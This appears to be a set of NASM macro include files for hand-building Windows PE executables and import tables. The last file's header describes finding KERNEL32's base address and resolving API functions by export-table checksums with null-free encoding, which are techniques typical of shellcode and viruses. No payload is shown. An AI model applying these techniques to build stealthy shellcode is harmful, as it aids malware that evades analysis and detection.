;================================== MZ Text ==================================
|
||||
%macro MZSection.text_Begin 0
|
||||
%ifctx MZExtendedHeader
|
||||
MZSection.text_Begin_FA:
|
||||
%define MZSection.text_VA(a) (a)-MZSection.text_Begin_FA
|
||||
%repl MZSection.text_Begin
|
||||
%else
|
||||
%error PE.INC error: MZSection.text_Begin => MZExtendedHeader
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%macro MZSection.text_End 0
|
||||
%ifctx MZSection.text_Begin
|
||||
MZSection.text_End_FA:
|
||||
DbAlign MZSection.text_Begin_FA,16
|
||||
MZSection.text_End_FAa:
|
||||
%repl MZSection.text_End
|
||||
%else
|
||||
%error PE.INC error: MZSection.text_End => MZSection.text_Begin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
;================================= PE Header =================================
|
||||
%define PEHeader_Machine_386 14Ch
|
||||
%define PEHeader_Machine_486 14Dh
|
||||
%define PEHeader_Machine_PENTIUM 14Eh
|
||||
%define PEHeader_Machine PEHeader_Machine_386
|
||||
%define PEHeader_DateHour 0
|
||||
%define PEHeader_OptionalHeaderFS 0E0h ; ?
|
||||
%define PEHeader_Characteristics_NORELOCATIONS 0000000000000001b
|
||||
%define PEHeader_Characteristics_EXECUTABLEIMAGE 0000000000000010b ;ex‚cutable/librairie
|
||||
%define PEHeader_Characteristics_16B 0000000001000000b ;programme 16 bits
|
||||
%define PEHeader_Characteristics_BYTESREVERSEDLOW 0000000010000000b
|
||||
%define PEHeader_Characteristics_32B 0000000100000000b ;programme 32 bits
|
||||
%define PEHeader_Characteristics_NODEBUGINFORMATIONS 0000001000000000b
|
||||
%define PEHeader_Characteristics_SYSTEMFILE 0001000000000000b
|
||||
%define PEHeader_Characteristics_DLL 0010000000000000b
|
||||
%define PEHeader_Characteristics_BYTESREVERSEDHIGH 1000000000000000b
|
||||
%define PEHeader_Characteristics PEHeader_Characteristics_NORELOCATIONS | PEHeader_Characteristics_EXECUTABLEIMAGE | PEHeader_Characteristics_32B
|
||||
|
||||
%macro PEHeader 0
|
||||
%ifctx MZSection.text_End
|
||||
BITS 32
|
||||
PEHeader_Begin_FA:
|
||||
PEHeader_Signature_FA: db 'PE',00h,00h
|
||||
PEHeader_Machine_FA: dw PEHeader_Machine
|
||||
PEHeader_SectionsNumber_FA: dw PEHeader_SectionsNumber
|
||||
%assign PEHeader_SectionsNumber_Assign 0
|
||||
PEHeader_DateHour_FA: dd PEHeader_DateHour
|
||||
dd 0
|
||||
dd 0
|
||||
PEHeader_OptionalHeaderFS_FA: dw PEHeader_OptionalHeaderFS
|
||||
PEHeader_Characteristics_FA: dw PEHeader_Characteristics
|
||||
PEHeader_End_FA:
|
||||
%define PESection_RVA(a) PESectionCur_RVAa_Assign+(a)-PESectionCur_FAa_Define
|
||||
%define PESection.text_RVA(a) PESection.text_RVAa+(a)-PESection.text_Begin_FAa
|
||||
%define PESection.rdata_RVA(a) PESection.rdata_RVAa+(a)-PESection.rdata_Begin_FAa
|
||||
%define PESection.data_RVA(a) PESection.data_RVAa+(a)-PESection.data_Begin_FAa
|
||||
%define PESection.bss_RVA(a) PESection.bss_RVAa+(a)-PESection.bss_Begin_FAa
|
||||
%define PESection.idata_RVA(a) PESection.idata_RVAa+(a)-PESection.idata_Begin_FAa
|
||||
%repl PEHeader
|
||||
%else
|
||||
%error PE.INC error: PEHeader => MZSection.text_End
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
;============================ PE Optional Header =============================
|
||||
%define PEOptionalHeader_MajorLinkerVersion 0
|
||||
%define PEOptionalHeader_MinorLinkerVersion 0
|
||||
%define PEOptionalheader_EipRVA PESection.text_RVA(PESection.text_Begin_FAa)
|
||||
%define PEOptionalHeader_ImageVAa 00400000h
|
||||
%define PEOptionalHeader_Va 1000h
|
||||
%define PEOptionalHeader_Fa 200h
|
||||
%define PEOptionalHeader_MajorOSVersion 4
|
||||
%define PEOptionalHeader_MinorOSVersion 0
|
||||
%define PEOptionalHeader_MajorProgramVersion 0
|
||||
%define PEOptionalHeader_MinorProgramVersion 0
|
||||
%define PEOptionalHeader_MajorSubSystemVersion 4
|
||||
%define PEOptionalHeader_MinorSubSystemVersion 0
|
||||
%define PEOptionalHeader_SubSystem_DRIVER 1
|
||||
%define PEOptionalHeader_SubSystem_GUI 2
|
||||
%define PEOptionalHeader_SubSystem_CONSOLE 3
|
||||
%define PEOptionalHeader_SubSystem_POSIX 7
|
||||
%define PEOptionalHeader_SubSystem PEOptionalHeader_SubSystem_GUI
|
||||
%define PEOptionalHeader_DllFlags_NOTIFYPROCESSATTACHMENTS 0001b
|
||||
%define PEOptionalHeader_DllFlags_NOTIFYPROCESSDETACHMENTS 0010b
|
||||
%define PEOptionalHeader_DllFlags_NOTIFYTHREADSATTACHMENTS 0100b
|
||||
%define PEOptionalHeader_DllFlags_NOTIFYTHREADSDETACHMENTS 1000b
|
||||
%define PEOptionalHeader_DllFlags 0
|
||||
%define PEOptionalHeader_ReservedStackVSa 0
|
||||
%define PEOptionalHeader_CommittedStackVSa 0
|
||||
%define PEOptionalHeader_ReservedHeapVSa 0
|
||||
%define PEOptionalHeader_CommittedHeapVSa 0
|
||||
|
||||
%macro PEOptionalHeader_Begin 0
|
||||
%ifctx PEHeader
|
||||
PEOptionalHeader_Begin_FA:
|
||||
PEOptionalHeader_Signature_FA: db 0Bh,01h
|
||||
PEOptionalHeader_MajorLinkerVersion_FA: db PEOptionalHeader_MajorLinkerVersion
|
||||
PEOptionalHeader_MinorLinkerVersion_FA: db PEOptionalHeader_MinorLinkerVersion
|
||||
PEOptionalHeader_CodeFSa_FA: dd PESection.text_FSa
|
||||
PEOptionalHeader_InitializedDataFSa_FA: dd PEOptionalHeader_InitializedDataFSa
|
||||
%assign PEOptionalHeader_InitializedDataFSa_Assign 0
|
||||
PEOptionalHeader_UninitializedDataVSa_FA: dd PESection.bss_VSa
|
||||
PEOptionalHeader_EipRVA_FA: dd PEOptionalheader_EipRVA
|
||||
PEOptionalHeader_CodeRVAa_FA: dd PESection.text_RVAa
|
||||
%assign PEOptionalHeader_DataRVAa_Assign 0
|
||||
PEOptionalHeader_DataRVAa_FA: dd PEOptionalHeader_DataRVAa ; ?
|
||||
PEOptionalHeader_ImageVAa_FA: dd PEOptionalHeader_ImageVAa
|
||||
PEOptionalHeader_Va_FA: dd PEOptionalHeader_Va
|
||||
PEOptionalHeader_Fa_FA: dd PEOptionalHeader_Fa
|
||||
PEOptionalHeader_MajorOSVersion_FA: dw PEOptionalHeader_MajorOSVersion
|
||||
PEOptionalHeader_MinorOSVersion_FA: dw PEOptionalHeader_MinorOSVersion
|
||||
PEOptionalHeader_MajorProgramVersion_FA: dw PEOptionalHeader_MajorProgramVersion
|
||||
PEOptionalHeader_MinorProgramVersion_FA: dw PEOptionalHeader_MinorProgramVersion
|
||||
PEOptionalHeader_MajorSubSystemVersion_FA: dw PEOptionalHeader_MajorSubSystemVersion
|
||||
PEOptionalHeader_MinorSubSystemVersion_FA: dw PEOptionalHeader_MinorSubSystemVersion
|
||||
dd 0
|
||||
PEOptionalHeader_ImageVSa_FA: dd PEOptionalHeader_ImageVSa
|
||||
PEOptionalHeader_HeadersFSa_FA: dd PESections_Begin_FAa-BIN_Begin_FA
|
||||
PEOptionalHeader_Checksum_FA: dd 0
|
||||
PEOptionalHeader_SubSystem_FA: dw PEOptionalHeader_SubSystem
|
||||
PEOptionalHeader_DllFlags_FA: dw PEOptionalHeader_DllFlags
|
||||
PEOptionalHeader_ReservedStackVSa_FA: dd PEOptionalHeader_ReservedStackVSa ;???
|
||||
PEOptionalHeader_CommittedStackVSa_FA: dd PEOptionalHeader_CommittedStackVSa ;???
|
||||
PEOptionalHeader_ReservedHeapVSa_FA: dd PEOptionalHeader_ReservedHeapVSa ;???
|
||||
PEOptionalHeader_CommittedHeapVSa_FA: dd PEOptionalHeader_CommittedHeapVSa ;???
|
||||
dd 0
|
||||
PEOptionalHeader_DirectoriesNumber_FA: dd PEOptionalHeader_DirectoriesNumber
|
||||
%assign PEOptionalHeader_DirectoriesNumber_Assign 0
|
||||
%repl PEOptionalHeader_Begin
|
||||
%else
|
||||
%error PE.INC error: PEOptionalHeader_Begin => PEHeader
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
;PEOptionalHeader_Directory name,RVA,FS
|
||||
%macro PEOptionalHeader_Directory 3
|
||||
%ifctx PEOptionalHeader_Begin
|
||||
PEOptionalHeader%1RVA_FA: dd %2
|
||||
PEOptionalHeader%1FS_FA: dd %3
|
||||
%assign PEOptionalHeader_DirectoriesNumber_Assign PEOptionalHeader_DirectoriesNumber_Assign+1
|
||||
%else
|
||||
%error PE.INC error: PEOptionalHeader_Directory => PEOptionalHeader_Begin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%macro PEOptionalHeader_End 0
|
||||
%ifctx PEOptionalHeader_Begin
|
||||
PEOptionalHeader_End_FA:
|
||||
DbAlign PEOptionalHeader_Begin_FA,PEHeader_OptionalHeaderFS
|
||||
PEOptionalHeader_End_FAa:
|
||||
PEOptionalHeader_DirectoriesNumber equ PEOptionalHeader_DirectoriesNumber_Assign
|
||||
%repl PEOptionalHeader_End
|
||||
%else
|
||||
%error PE.INC error: PEOptionalHeader_End => PEOptionalHeader_Begin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
;============================= PE Section Header =============================
|
||||
%define PESectionHeader_Flags_EXECUTABLECODE 00000000000000000000000000100000b
|
||||
%define PESectionHeader_Flags_DATAFROMFILE 00000000000000000000000001000000b
|
||||
%define PESectionHeader_Flags_DATA0 00000000000000000000000010000000b
|
||||
%define PESectionHeader_Flags_COMMENTS 00000000000000000000001000000000b
|
||||
%define PESectionHeader_Flags_COMMONBLOCKDATA 00000000000000000001000000000000b
|
||||
%define PESectionHeader_Flags_FARDATA 00000000000000001000000000000000b
|
||||
%define PESectionHeader_Flags_PURGEABLEDATA 00000000000000100000000000000000b
|
||||
%define PESectionHeader_Flags_NONMOVABLEDATA 00000000000001000000000000000000b
|
||||
%define PESectionHeader_Flags_SHAREDINSTANCES 00010000000000000000000000000000b ;.text
|
||||
%define PESectionHeader_Flags_EXECUTEACCESS 00100000000000000000000000000000b
|
||||
%define PESectionHeader_Flags_READACCESS 01000000000000000000000000000000b
|
||||
%define PESectionHeader_Flags_WRITEACCESS 10000000000000000000000000000000b
|
||||
|
||||
;PESectionHeader .name,'.name',flags
|
||||
%macro PESectionHeader 3
|
||||
%ifctx PEOptionalHeader_End
|
||||
PESectionHeader%1_Name_FA: db %2
|
||||
DbAlign PESectionHeader%1_Name_FA,8
|
||||
PESectionHeader%1_VS_FA: dd PESection%1_VS
|
||||
PESectionHeader%1_RVAa_FA: dd PESection%1_RVAa
|
||||
PESectionHeader%1_FSa_FA: dd PESection%1_FSa
|
||||
PESectionHeader%1_FAa_FA: dd PESectionHeader%1_FAa
|
||||
dd 0
|
||||
dd 0
|
||||
dw 0
|
||||
dw 0
|
||||
PESectionHeader%1_Flags_FA: dd %3
|
||||
%else
|
||||
%error PE.INC error: PESectionHeader => PEOptionalHeader_End
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
;================================ PE Sections ================================
|
||||
%macro PESections_Begin 0
|
||||
%ifctx PEOptionalHeader_End
|
||||
PESections_Begin_FA:
|
||||
DbAlign BIN_Begin_FA,PEOptionalHeader_Fa
|
||||
PESections_Begin_FAa:
|
||||
%assign PESectionPrec_FSa_Assign PESections_Begin_FAa-BIN_Begin_FA
|
||||
%assign PESectionPrec_RVAa_Assign 0
|
||||
%assign PESectionCur_RVAa_Assign 0
|
||||
%define PESectionCur_FAa_Define 0
|
||||
;impossible dans MacroPESection_Begin
|
||||
%define PESection_VA(a) PEOptionalHeader_ImageVAa+PESectionCur_RVAa_Assign+(a)-PESectionCur_FAa_Define
|
||||
%define PESection.text_VA(a) PEOptionalHeader_ImageVAa+PESection.text_RVAa+(a)-PESection.text_Begin_FAa
|
||||
%define PESection.rdata_VA(a) PEOptionalHeader_ImageVAa+PESection.rdata_RVAa+(a)-PESection.rdata_Begin_FAa
|
||||
%define PESection.data_VA(a) PEOptionalHeader_ImageVAa+PESection.data_RVAa+(a)-PESection.data_Begin_FAa
|
||||
%define PESection.bss_VA(a) PEOptionalHeader_ImageVAa+PESection.bss_RVAa+(a)-PESection.bss_Begin_FAa
|
||||
%define PESection.idata_VA(a) PEOptionalHeader_ImageVAa+PESection.idata_RVAa+(a)-PESection.idata_Begin_FAa
|
||||
%repl PESections_Begin
|
||||
%else
|
||||
%error PE.INC error: PESections_Begin => PEOptionalHeader
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
;MacroPESection_End .name
|
||||
%macro MacroPESection_End 1
|
||||
PESection%1_End_FA:
|
||||
DbAlign BIN_Begin_FA,PEOptionalHeader_Fa
|
||||
PESection%1_End_FAa:
|
||||
%assign PEHeader_SectionsNumber_Assign PEHeader_SectionsNumber_Assign+1
|
||||
PESection%1_VS equ PESection%1_End_FA-PESection%1_Begin_FAa
|
||||
%endmacro
|
||||
|
||||
|
||||
%macro PESection.text_Begin 0
|
||||
%ifctx PESections_Begin
|
||||
%assign PESectionCur_RVAa_Assign (((PESectionPrec_RVAa_Assign+PESectionPrec_FSa_Assign-1)/PEOptionalHeader_Va)+1)*PEOptionalHeader_Va
|
||||
PESection.text_Begin_FAa:
|
||||
%define PESectionCur_FAa_Define PESection.text_Begin_FAa
|
||||
%push PESection.text_Begin
|
||||
%else
|
||||
%error PE.INC error: PESection.text_Begin => PESections_Begin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%macro PESection.text_End 0
|
||||
%ifctx PESection.text_Begin
|
||||
MacroPESection_End .text
|
||||
%assign PESectionPrec_RVAa_Assign PESectionCur_RVAa_Assign
|
||||
PESection.text_RVAa equ PESectionPrec_RVAa_Assign
|
||||
PESection.text_FSa equ PESection.text_End_FAa-PESection.text_Begin_FAa
|
||||
%assign PESectionPrec_FSa_Assign PESection.text_FSa
|
||||
PESectionHeader.text_FAa equ PESection.text_Begin_FAa
|
||||
%pop
|
||||
%else
|
||||
%error PE.INC error: PESection.text_End => PESection.text_Begin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
|
||||
%macro PESection.rdata_Begin 0
|
||||
%ifctx PESections_Begin
|
||||
%assign PESectionCur_RVAa_Assign (((PESectionPrec_RVAa_Assign+PESectionPrec_FSa_Assign-1)/PEOptionalHeader_Va)+1)*PEOptionalHeader_Va
|
||||
PESection.rdata_Begin_FAa:
|
||||
%define PESectionCur_FAa_Define PESection.rdata_Begin_FAa
|
||||
%push PESection.rdata_Begin
|
||||
%else
|
||||
%error PE.INC error: PESection.rdata_Begin => PESections_Begin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%macro PESection.rdata_End 0
|
||||
%ifctx PESection.rdata_Begin
|
||||
MacroPESection_End .rdata
|
||||
%assign PESectionPrec_RVAa_Assign PESectionCur_RVAa_Assign
|
||||
PESection.rdata_RVAa equ PESectionPrec_RVAa_Assign
|
||||
PESection.rdata_FSa equ PESection.rdata_End_FAa-PESection.rdata_Begin_FAa
|
||||
%assign PESectionPrec_FSa_Assign PESection.rdata_FSa
|
||||
PESectionHeader.rdata_FAa equ PESection.rdata_Begin_FAa
|
||||
%assign PEOptionalHeader_InitializedDataFSa_Assign PEOptionalHeader_InitializedDataFSa_Assign+PESection.rdata_FSa
|
||||
%if PEOptionalHeader_DataRVAa_Assign == 0
|
||||
%assign PEOptionalHeader_DataRVAa_Assign PESection.rdata_RVAa
|
||||
%endif
|
||||
%pop
|
||||
%else
|
||||
%error PE.INC error: PESection.rdata_End => PESection.rdata_Begin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
|
||||
%macro PESection.data_Begin 0
|
||||
%ifctx PESections_Begin
|
||||
%assign PESectionCur_RVAa_Assign (((PESectionPrec_RVAa_Assign+PESectionPrec_FSa_Assign-1)/PEOptionalHeader_Va)+1)*PEOptionalHeader_Va
|
||||
PESection.data_Begin_FAa:
|
||||
%define PESectionCur_FAa_Define PESection.data_Begin_FAa
|
||||
%push PESection.data_Begin
|
||||
%else
|
||||
%error PE.INC error: PESection.data_Begin => PESections_Begin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%macro PESection.data_End 0
|
||||
%ifctx PESection.data_Begin
|
||||
MacroPESection_End .data
|
||||
%assign PESectionPrec_RVAa_Assign PESectionCur_RVAa_Assign
|
||||
PESection.data_RVAa equ PESectionPrec_RVAa_Assign
|
||||
PESection.data_FSa equ PESection.data_End_FAa-PESection.data_Begin_FAa
|
||||
PESectionHeader.data_FAa equ PESection.data_Begin_FAa
|
||||
%assign PESectionPrec_FSa_Assign PESection.data_FSa
|
||||
%assign PEOptionalHeader_InitializedDataFSa_Assign PEOptionalHeader_InitializedDataFSa_Assign+PESection.data_FSa
|
||||
%if PEOptionalHeader_DataRVAa_Assign == 0
|
||||
%assign PEOptionalHeader_DataRVAa_Assign PESection.data_RVAa
|
||||
%endif
|
||||
%pop
|
||||
%else
|
||||
%error PE.INC error: PESection.data_End => PESection.data_Begin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
|
||||
%macro PESection.bss_Begin 0
|
||||
%ifctx PESections_Begin
|
||||
%assign PESectionCur_RVAa_Assign (((PESectionPrec_RVAa_Assign+PESectionPrec_FSa_Assign-1)/PEOptionalHeader_Va)+1)*PEOptionalHeader_Va
|
||||
SECTION .bss
|
||||
PESection.bss_Begin_FAa:
|
||||
%define PESectionCur_FAa_Define PESection.bss_Begin_FAa
|
||||
%push PESection.bss_Begin
|
||||
%else
|
||||
%error PE.INC error: PESection.bss_Begin => PESections_Begin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%macro PESection.bss_End 0
|
||||
%ifctx PESection.bss_Begin
|
||||
PESection.bss_End_FA:
|
||||
ResbAlign PESection.bss_Begin_FAa,PEOptionalHeader_Va
|
||||
PESection.bss_End_FAa:
|
||||
%assign PEHeader_SectionsNumber_Assign PEHeader_SectionsNumber_Assign+1
|
||||
PESection.bss_VS equ PESection.bss_End_FA-PESection.bss_Begin_FAa
|
||||
PESection.bss_VSa equ PESection.bss_End_FAa-PESection.bss_Begin_FAa
|
||||
SECTION .text
|
||||
%assign PESectionPrec_RVAa_Assign PESectionCur_RVAa_Assign
|
||||
PESection.bss_RVAa equ PESectionPrec_RVAa_Assign
|
||||
PESection.bss_FSa equ 0
|
||||
%assign PESectionPrec_FSa_Assign PESection.bss_VSa
|
||||
PESectionHeader.bss_FAa equ 0
|
||||
%pop
|
||||
%else
|
||||
%error PE.INC error: PESection.bss_End => PESection.bss_Begin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
|
||||
%macro PESection.idata_Begin 0
|
||||
%ifctx PESections_Begin
|
||||
%assign PESectionCur_RVAa_Assign (((PESectionPrec_RVAa_Assign+PESectionPrec_FSa_Assign-1)/PEOptionalHeader_Va)+1)*PEOptionalHeader_Va
|
||||
PESection.idata_Begin_FAa:
|
||||
%define PESectionCur_FAa_Define PESection.idata_Begin_FAa
|
||||
%push PESection.idata_Begin
|
||||
%else
|
||||
%error PE.INC error: PESection.idata_Begin => PESections_Begin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%macro PESection.idata_End 0
|
||||
%ifctx PESection.idata_Begin
|
||||
MacroPESection_End .idata
|
||||
%assign PESectionPrec_RVAa_Assign PESectionCur_RVAa_Assign
|
||||
PESection.idata_RVAa equ PESectionPrec_RVAa_Assign
|
||||
PESection.idata_FSa equ PESection.idata_End_FAa-PESection.idata_Begin_FAa
|
||||
PESectionHeader.idata_FAa equ PESection.idata_Begin_FAa
|
||||
%assign PESectionPrec_FSa_Assign PESection.idata_FSa
|
||||
%pop
|
||||
%else
|
||||
%error PE.INC error: PESection.idata_End => PESection.idata_Begin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
|
||||
%macro PESection.rsrc_Begin 0
|
||||
%ifctx PESections_Begin
|
||||
%assign PESectionCur_RVAa_Assign (((PESectionPrec_RVAa_Assign+PESectionPrec_FSa_Assign-1)/PEOptionalHeader_Va)+1)*PEOptionalHeader_Va
|
||||
PESection.rsrc_Begin_FAa:
|
||||
%define PESectionCur_FAa_Define PESection.rsrc_Begin_FAa
|
||||
%push PESection.rsrc_Begin
|
||||
%else
|
||||
%error PE.INC error: PESection.rsrc_Begin => PESections_Begin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%macro PESection.rsrc_End 0
|
||||
%ifctx PESection.rsrc_Begin
|
||||
MacroPESection_End .rsrc
|
||||
%assign PESectionPrec_RVAa_Assign PESectionCur_RVAa_Assign
|
||||
PESection.rsrc_RVAa equ PESectionPrec_RVAa_Assign
|
||||
PESection.rsrc_FSa equ PESection.rsrc_End_FAa-PESection.rsrc_Begin_FAa
|
||||
PESectionHeader.rsrc_FAa equ PESection.rsrc_Begin_FAa
|
||||
%assign PESectionPrec_FSa_Assign PESection.rsrc_FSa
|
||||
%pop
|
||||
%else
|
||||
%error PE.INC error: PESection.rsrc_End => PESection.rsrc_Begin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
|
||||
%macro PESections_End 0
|
||||
%ifctx PESections_Begin
|
||||
PESections_End_FAa:
|
||||
PEHeader_SectionsNumber equ PEHeader_SectionsNumber_Assign
|
||||
PEOptionalHeader_InitializedDataFSa equ PEOptionalHeader_InitializedDataFSa_Assign
|
||||
PEOptionalHeader_DataRVAa equ PEOptionalHeader_DataRVAa_Assign
|
||||
%assign PESectionPrec_RVAa_Assign (((PESectionPrec_RVAa_Assign+PESectionPrec_FSa_Assign) / PEOptionalHeader_Va)+1)*PEOptionalHeader_Va
|
||||
PEOptionalHeader_ImageVSa equ PESectionPrec_RVAa_Assign
|
||||
Import_Directorys_RVA equ Import_Directorys_Assign
|
||||
%repl PESections_End
|
||||
%else
|
||||
%error PE.INC error: PESections_End => PESections_Begin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
;============================= Import Directorys =============================
|
||||
;Import_Directorys_Begin sectionname
|
||||
%macro Import_Directorys_Begin 1
|
||||
Import_Directorys_Begin_FA:
|
||||
%assign Import_Directorys_Assign PESectionCur_RVAa_Assign+Import_Directorys_Begin_FA-PESectionCur_FAa_Define
|
||||
%push Import_Directorys_Begin
|
||||
%endmacro
|
||||
|
||||
;Import_Directory dlllogicalname
|
||||
%macro Import_Directory 1
|
||||
%ifctx Import_Directorys_Begin
|
||||
dd PESection_RVA(Import.%1_RVAs)
|
||||
dd 0 ;??? (date … 0)
|
||||
dd 0FFFFFFFFh
|
||||
dd PESection_RVA(Import.%1_String_Dll)
|
||||
dd PESection_RVA(Import.%1_VAs)
|
||||
%else
|
||||
%error PE.INC error: Import_Directory => Import_Directorys_Begin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%macro Import_Directorys_End 0
|
||||
%ifctx Import_Directorys_Begin
|
||||
times 5 dd 0
|
||||
Import_Directorys_End_FA:
|
||||
Import_Directorys_VS equ Import_Directorys_End_FA-Import_Directorys_Begin_FA
|
||||
%pop
|
||||
%else
|
||||
%error PE.INC error: Import_Directorys_End => Import_Directorys_Begin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
|
||||
;Import_RVAs_Begin dlllogicalname
|
||||
%macro Import_RVAs_Begin 1
|
||||
Import.%1_RVAs:
|
||||
%push Import_RVAs_Begin
|
||||
%endmacro
|
||||
|
||||
;Import_RVA dlllogicalname,functionlogicalname
|
||||
%macro Import_RVA 2
|
||||
%ifctx Import_RVAs_Begin
|
||||
dd PESection_RVA(Import.%1.%2_String_Function)
|
||||
%else
|
||||
%error PE.INC error: Import_RVA => Import_RVAs_Begin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%macro Import_RVAs_End 0
|
||||
%ifctx Import_RVAs_Begin
|
||||
dd 0
|
||||
%pop
|
||||
%else
|
||||
%error PE.INC error: Import_RVAs_End => Import_RVAs_Begin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
|
||||
;Import_VAs_Begin dlllogicalname
|
||||
%macro Import_VAs_Begin 1
|
||||
Import.%1_VAs:
|
||||
%push Import_VAs_Begin
|
||||
%endmacro
|
||||
|
||||
;Import_VA dlllogicalname,functionlogicalname,[va]
|
||||
%macro Import_VA 2-3 0FFFFFFFFh
|
||||
%ifctx Import_VAs_Begin
|
||||
Import.%1.%2: dd %3
|
||||
%2 equ PEOptionalHeader_ImageVAa+PESectionCur_RVAa_Assign+Import.%1.%2-PESectionCur_FAa_Define
|
||||
%else
|
||||
%error PE.INC error: Import_VA => Import_VAs_Begin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%macro Import_VAs_End 0
|
||||
%ifctx Import_VAs_Begin
|
||||
dd 0
|
||||
%pop
|
||||
%else
|
||||
%error PE.INC error: Import_VAs_End => Import_VAs_Begin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
|
||||
;Import_Strings_Begin dlllogicalname
|
||||
%macro Import_Strings_Begin 1
|
||||
Import.%1_Strings:
|
||||
%push Import_Strings_Begin
|
||||
%endmacro
|
||||
|
||||
;Import_String_Function dlllogicalname,functionlogicalname,"name",[ordinal]
|
||||
%macro Import_String_Function 3-4 0h
|
||||
%ifctx Import_Strings_Begin
|
||||
Import.%1.%2_String_Function:
|
||||
dw %4
|
||||
db %3,0
|
||||
%else
|
||||
%error PE.INC error: Import_String_Function => Import_Strings_Begin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
;Import_String_Dll dlllogicalname,"dllname"
|
||||
%macro Import_String_Dll 2
|
||||
%ifctx Import_Strings_Begin
|
||||
Import.%1_String_Dll:
|
||||
db %2,0
|
||||
%repl Import_String_Dll
|
||||
%else
|
||||
%error PE.INC error: Import_String_Dll => Import_Strings_Begin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%macro Import_Strings_End 0
|
||||
%ifctx Import_String_Dll
|
||||
%pop
|
||||
%else
|
||||
%error PE.INC error: Import_Strings_End => Import_String_Dll
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
;================================== BIN End ==================================
|
||||
%macro BIN_End 0
|
||||
%ifctx PESections_End
|
||||
BIN_End_FA:
|
||||
DbAlign BIN_Begin_FA,PEOptionalHeader_Fa
|
||||
BIN_End_FAa:
|
||||
%pop
|
||||
%else
|
||||
%error PE.INC error: BIN_End => PESections_End
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%endif
|
|
@ -0,0 +1,55 @@
|
|||
; MACROS FOR WIN32 PROGRAMMING v1.0a
|
||||
; ==================================
|
||||
|
||||
|
||||
;WIN32.INC_NO_EXTERN_IMPORT => pas d'Import
|
||||
|
||||
|
||||
;ExternImport function,dll [,d|[*]]
|
||||
; <- FUNCTION.INC_CONVENTION
|
||||
|
||||
;================================= General ===================================
|
||||
%ifndef _WIN32.INC
|
||||
%define _WIN32.INC
|
||||
|
||||
%include "function.inc"
|
||||
%include "language.inc"
|
||||
%include "win32n.inc"
|
||||
%include "win32dll.inc"
|
||||
|
||||
%macro WIN32.INC 0
|
||||
FUNCTION.INC
|
||||
%undef WIN32.INC_NO_EXTERN_IMPORT
|
||||
%endmacro
|
||||
|
||||
%macro WIN32.INC~ 0
|
||||
FUNCTION.INC~
|
||||
%undef WIN32.INC_NO_EXTERN_IMPORT
|
||||
%endmacro
|
||||
|
||||
WIN32.INC
|
||||
|
||||
%macro ExternImport 2-3
|
||||
%ifndef ExternImport_%1
|
||||
%ifndef WIN32.INC_NO_EXTERN_IMPORT
|
||||
extern %1
|
||||
import %1 %2
|
||||
Alias @%1,[%1]
|
||||
FunctionDefine %1,FUNCTION.INC_CONVENTION
|
||||
%else
|
||||
%if %0==3
|
||||
%ifnum %3
|
||||
FunctionDefine %1,FUNCTION.INC_CONVENTION,%3
|
||||
%else
|
||||
Alias @%1,%3
|
||||
FunctionDefine %1,FUNCTION.INC_CONVENTION
|
||||
%endif
|
||||
%else
|
||||
Error WIN32,NO_EXTERN_IMPORT => ExternImport %1,%2,d|[*]
|
||||
%endif
|
||||
%endif
|
||||
%define ExternImport_%1
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%endif
|
|
@ -0,0 +1,390 @@
|
|||
; MACROS POUR L'IMPORTATION DE FONCTIONS DE DLLS WIN32 v0.9a
|
||||
; ==========================================================
|
||||
|
||||
|
||||
;WIN32DLL.INC_TABLE_REGISTER = edi = registre qui pointera la table
|
||||
;WIN32DLL.INC_PUSH => sauvegarde des registres sur la pile
|
||||
;WIN32DLL.INC_KERNEL32.DLL = WIN32DLL.INC_9X | WIN32DLL.INC_NT
|
||||
; |WIN32DLL.INC_2000|r contenant l'adresse de base de KERNEL32.DLL
|
||||
;WIN32DLL.INC_BYTE_BEGIN = 252 = 1er byte du codage dans la table
|
||||
|
||||
|
||||
;GetBase r
|
||||
; r -> adresse de base à partir de l'adresse originale contenue dans r
|
||||
|
||||
;GetChecksum(chaine)
|
||||
; EAX -> checksum de chaine
|
||||
;GetVAExportChecksum(base,checksum)
|
||||
; EAX -> VA de la fonction de checksum à partir de l'Export Table de
|
||||
; l'adresse de base de la DLL parcourue | 0
|
||||
|
||||
;DllBegin
|
||||
; Dll kernel32.dll,"kernel32.dll"
|
||||
; [DllFunction LoadLibraryA,...]
|
||||
; [DllFunction GetProcAddress,...]
|
||||
; ...
|
||||
; Dll dll [,"dll"]
|
||||
; DllFunction function [,"function"|d [,d]]
|
||||
; ...
|
||||
; ...
|
||||
;DllEnd
|
||||
;<- WIN32.INC_NO_EXTERN_IMPORT,BYTE.INC_NO_00,FUNCTION.INC_CONVENTION
|
||||
|
||||
;================================= General ===================================
|
||||
%ifndef _WIN32DLL.INC
|
||||
%define _WIN32DLL.INC
|
||||
|
||||
